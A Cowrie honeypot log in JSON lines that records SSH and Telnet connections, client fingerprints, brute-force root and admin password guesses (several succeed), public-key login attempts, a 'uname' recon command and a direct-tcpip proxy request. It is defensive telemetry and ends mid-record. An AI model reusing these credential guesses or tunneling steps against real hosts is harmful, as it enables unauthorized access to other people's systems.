{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:54:57.900231Z","src_ip":"194.233.79.134","session":"b44cc01a73fe"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T01:54:57.900954Z","src_ip":"194.233.79.134","session":"b44cc01a73fe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:54:58.706879Z","src_ip":"194.233.79.134","session":"b44cc01a73fe"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:54:58.708380Z","src_ip":"194.233.79.134","session":"b44cc01a73fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30492,"dst_ip":"1.2.3.4","dst_port":22,"session":"1482be9eea78","protocol":"ssh","message":"New connection: 212.227.235.229:30492 (1.2.3.4:22) [session: 1482be9eea78]","sensor":"my-vps","timestamp":"2025-08-28T01:55:08.967374Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:55:08.968518Z","src_ip":"212.227.235.229","session":"1482be9eea78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30884,"dst_ip":"1.2.3.4","dst_port":22,"session":"36cabfb92d03","protocol":"ssh","message":"New connection: 212.227.235.229:30884 (1.2.3.4:22) [session: 36cabfb92d03]","sensor":"my-vps","timestamp":"2025-08-28T01:55:09.076634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:55:09.077353Z","src_ip":"212.227.235.229","session":"36cabfb92d03"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T01:55:09.212162Z","src_ip":"212.227.235.229","session":"36cabfb92d03"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:55:09.619187Z","src_ip":"212.227.235.229","session":"36cabfb92d03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T01:55:09.755076Z","session":"36cabfb92d03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41079,"dst_ip":"1.2.3.4","dst_port":23,"session":"d04fe94fb7b1","protocol":"telnet","message":"New connection: 212.227.235.229:41079 (1.2.3.4:23) [session: d04fe94fb7b1]","sensor":"my-vps","timestamp":"2025-08-28T01:55:16.160906Z"}
{"eventid":"cowrie.session.closed","duration":13.860435962677002,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:55:30.021263Z","src_ip":"212.227.235.229","session":"d04fe94fb7b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46614,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dfe621fc6c9","protocol":"ssh","message":"New connection: 212.227.125.160:46614 (1.2.3.4:22) [session: 4dfe621fc6c9]","sensor":"my-vps","timestamp":"2025-08-28T01:55:41.774034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:55:41.775175Z","src_ip":"212.227.125.160","session":"4dfe621fc6c9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:55:41.835067Z","src_ip":"212.227.125.160","session":"4dfe621fc6c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"craft","message":"login attempt [admin/craft] failed","sensor":"my-vps","timestamp":"2025-08-28T01:55:42.158430Z","src_ip":"212.227.125.160","session":"4dfe621fc6c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"corgan","message":"login attempt [admin/corgan] failed","sensor":"my-vps","timestamp":"2025-08-28T01:55:43.220849Z","src_ip":"212.227.125.160","session":"4dfe621fc6c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cooker","message":"login attempt [admin/cooker] failed","sensor":"my-vps","timestamp":"2025-08-28T01:55:44.283689Z","src_ip":"212.227.125.160","session":"4dfe621fc6c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"computers","message":"login attempt [admin/computers] failed","sensor":"my-vps","timestamp":"2025-08-28T01:55:45.346789Z","src_ip":"212.227.125.160","session":"4dfe621fc6c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"citibank","message":"login attempt [admin/citibank] failed","sensor":"my-vps","timestamp":"2025-08-28T01:55:46.408686Z","src_ip":"212.227.125.160","session":"4dfe621fc6c9"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:55:47.470623Z","src_ip":"212.227.125.160","session":"4dfe621fc6c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54250,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0cf03f2b2e1","protocol":"telnet","message":"New connection: 212.227.235.229:54250 (1.2.3.4:23) [session: b0cf03f2b2e1]","sensor":"my-vps","timestamp":"2025-08-28T01:55:57.274104Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:55:57.475024Z","src_ip":"212.227.235.229","session":"b0cf03f2b2e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:55:57.557513Z","src_ip":"212.227.235.229","session":"b0cf03f2b2e1"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:56:19.076746Z","src_ip":"212.227.235.229","session":"36cabfb92d03"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":36378,"dst_ip":"1.2.3.4","dst_port":22,"session":"caa4852be2ab","protocol":"ssh","message":"New connection: 194.233.79.134:36378 (1.2.3.4:22) [session: caa4852be2ab]","sensor":"my-vps","timestamp":"2025-08-28T01:56:22.672077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:56:22.820049Z","src_ip":"194.233.79.134","session":"caa4852be2ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:56:23.076697Z","src_ip":"194.233.79.134","session":"caa4852be2ab"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:56:24.538928Z","src_ip":"194.233.79.134","session":"caa4852be2ab"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:56:25.834432Z","src_ip":"194.233.79.134","session":"caa4852be2ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43522,"dst_ip":"1.2.3.4","dst_port":22,"session":"4328084d4923","protocol":"ssh","message":"New connection: 212.227.125.160:43522 (1.2.3.4:22) [session: 4328084d4923]","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.721867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.722829Z","src_ip":"212.227.125.160","session":"4328084d4923"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.764866Z","src_ip":"212.227.125.160","session":"4328084d4923"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.851542Z","src_ip":"212.227.125.160","session":"4328084d4923"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.852424Z","src_ip":"212.227.125.160","session":"4328084d4923"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMtPQsyaqw+aw2IVa/8L11Jo5cY+yQs6PVsZ52P1EsjCUO1W6i4Ck/VnmYZQNf7HphdMkf/5vhwy5XE9gLWlLJBT30KQZzaZvHWfy7Bnpy5EMgeFIqGhYy/4H7r33MPKTzhlmezdn7AlipkrP8Kb/l5NBWLLB1ZNa8TTYI9T1tYRzm+gW1+uVpNuz6WYf+iY7ZcTqlivARqQLBbwK4CoXiWDe395gXJHySnH+Tri5g8LU+M+mnWaRVfieJ0F1+/niQ7e4Vdp4Fo+fxHWTx6+wElYK7GFKytI1cMlOTZTU3DB84de8dLVynaxCv7BzwaFkPL+Ar5sx9LoCHRU0WCi6czVdOg3OaxUrkxP0S/t79AhVaIAsR+I5IvStVI8SIlUQL9RlaKcvqje2z9etRxHYNM8TDUivjcHHGPQOSJROG0VPUMNAHR5EJAZKbMq7DLpXsO8+4nvGQJMuNuMWcU8MMTcLJwfKEQyHaJYXRKq8v8FkJHuL7wi5wxx4E1UFRSGc=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.896335Z","src_ip":"212.227.125.160","session":"4328084d4923"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMtPQsyaqw+aw2IVa/8L11Jo5cY+yQs6PVsZ52P1EsjCUO1W6i4Ck/VnmYZQNf7HphdMkf/5vhwy5XE9gLWlLJBT30KQZzaZvHWfy7Bnpy5EMgeFIqGhYy/4H7r33MPKTzhlmezdn7AlipkrP8Kb/l5NBWLLB1ZNa8TTYI9T1tYRzm+gW1+uVpNuz6WYf+iY7ZcTqlivARqQLBbwK4CoXiWDe395gXJHySnH+Tri5g8LU+M+mnWaRVfieJ0F1+/niQ7e4Vdp4Fo+fxHWTx6+wElYK7GFKytI1cMlOTZTU3DB84de8dLVynaxCv7BzwaFkPL+Ar5sx9LoCHRU0WCi6czVdOg3OaxUrkxP0S/t79AhVaIAsR+I5IvStVI8SIlUQL9RlaKcvqje2z9etRxHYNM8TDUivjcHHGPQOSJROG0VPUMNAHR5EJAZKbMq7DLpXsO8+4nvGQJMuNuMWcU8MMTcLJwfKEQyHaJYXRKq8v8FkJHuL7wi5wxx4E1UFRSGc=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.897807Z","src_ip":"212.227.125.160","session":"4328084d4923"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.941189Z","src_ip":"212.227.125.160","session":"4328084d4923"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43526,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb8dd07eaf5e","protocol":"ssh","message":"New connection: 212.227.125.160:43526 (1.2.3.4:22) [session: cb8dd07eaf5e]","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.979289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:36.980047Z","src_ip":"212.227.125.160","session":"cb8dd07eaf5e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.021409Z","src_ip":"212.227.125.160","session":"cb8dd07eaf5e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.101137Z","src_ip":"212.227.125.160","session":"cb8dd07eaf5e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.101764Z","src_ip":"212.227.125.160","session":"cb8dd07eaf5e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.143378Z","src_ip":"212.227.125.160","session":"cb8dd07eaf5e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key login attempt for [root] 